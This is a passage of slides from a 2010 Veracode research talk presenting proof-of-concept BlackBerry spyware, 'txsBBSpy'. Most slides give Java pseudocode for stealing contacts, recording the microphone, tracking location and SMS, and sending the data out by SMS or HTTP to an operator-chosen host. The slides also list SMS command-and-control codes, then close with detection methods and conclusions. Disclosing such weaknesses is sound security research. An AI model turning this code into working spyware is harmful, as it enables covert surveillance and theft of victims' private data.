txsBBSpy Technical Specifications ©
2010 Veracode, Inc. 34
35.
Technical Methods Data
Dumpers Listeners Exfiltration Methods Command and Control © 2010 Veracode, Inc. 35
36.
Dump Contact Information
API – javax.microedition.pim – net.rim.blackberry.API.pdap Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 36
37.
Dump Microphone API
– javax.microedition.media.control – javax.microedition.media.manager – javax.microedition.media.player Pseudocode Player p = Manager.createPlayer("capture://audio"); RecordControl rc = (RecordControl)p.getControl("RecordControl"); ByteArrayOutputStream os = new ByteArrayOutputStream(); rc.setRecordStream(os); rc.startRecord(); © 2010 Veracode, Inc. 37
38.
Location Listener Create
the class that implements LocationListener Interface Get LocationProvider instance Add LocationListener API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 38
39.
SMS Outbound Listener
Create class that implements “SendListener” interface Add the SendListener API – net.rim.blackberry.api.sms.SMS – javax.wireless.messaging.TextMessage Pseudocode sl = new SMSOUTListener(); SMS.addSendListener(sl); © 2010 Veracode, Inc. 39
40.
PIM Listener Create
the class that implements PIMListListener Interface Open Target PIMList and Add PIMListListener API – javax.microedition.pim.PIM.getInstance() – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener Pseudocode pl = new PhoneLogger(); pim = PIM.getInstance(); contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); contacts.addListener(piml); © 2010 Veracode, Inc. 40
41.
SMS Datagram Exfiltration
API – javax.microedition.io.Connector – javax.microedition.io.DatagramConnection – javax.microedition.io.Datagram Pseudocode DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590 "); Datagram d = dc.newDatagram(dc.getMaximumLength()); byte[] buf = msg.getBytes(); d.setData(buf, 0, buf.length); d.write(buf, 0, buf.length); dc.send(d); © 2010 Veracode, Inc. 41
42.
HTTP Get/Post Exfiltration
API – javax.microedition.io.Connector – javax.microedition.io.HttpConnection Pseudocode c = (HttpConnection)Connector.open("http://"+this.url+"/“+msg); rc = c.getResponseCode(); if (rc != HttpConnection.HTTP_OK) { c.setRequestMethod(HttpConnection.POST); c.setRequestProperty("User-Agent", "BBSpyware|"+msg); c.setRequestProperty("Content-Language", "en-US"); os = c.openOutputStream(); os.write(msg.getBytes()); © 2010 Veracode, Inc. 42
43.
Threaded Exfiltration Listener
based exfiltration methods use separate thread Doesn‟t freeze UI interface Queues messages outbound if network is slow ThreadedSend extends Thread class Uses run() method to call exfiltrate() © 2010 Veracode, Inc. 43
44.
Command and Control
initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSDUMPCON TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSIP:[IP] TXSEM:[EMAIL] TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING © 2010 Veracode, Inc. 44
45.
Methods of Detection
and Future Work © 2010 Veracode, Inc. 45
46.
Methods of Detection
Additional Operating System Prompts – Remove the “Trust Application” prompt requiring individual configuration Signature Based – This is how the current anti-virus world is failing Sandbox Based Execution Heuristics – Still requires execution in a sandbox and is reactive – Can‟t ensure complete execution Static Decompilation and Analysis – Enumeration of sources of sensitive taint and exfiltration sinks – Control/Data flow mapping for tracing sensitive taint from source to sink – Compare findings against expected values © 2010 Veracode, Inc. 46
47.
Future Work (Offensive
AND Defensive) Reverse engineer .cod file format Continued research into unobstructed installation methods (requires exploitation) Infect PC with virus that acts as distribution hub Research additional exfiltration methods for tunneling without prompting © 2010 Veracode, Inc. 47
48.
Demonstration © 2010 Veracode,
Inc. 48
49.
Conclusion Mobile spyware
is trivial to write Minimal methods of real time eradication or detection of spyware type activities Security model of mobile platforms too loose No easy/automated way to confirm for ourselves what the applications are actually doing We are currently trusting the vendor application store provider for the majority of our mobile device security © 2010 Veracode, Inc. 49
50.
The Monkey Steals
the Berries! Questions? © 2010 Veracode, Inc. 50
51.
Questions?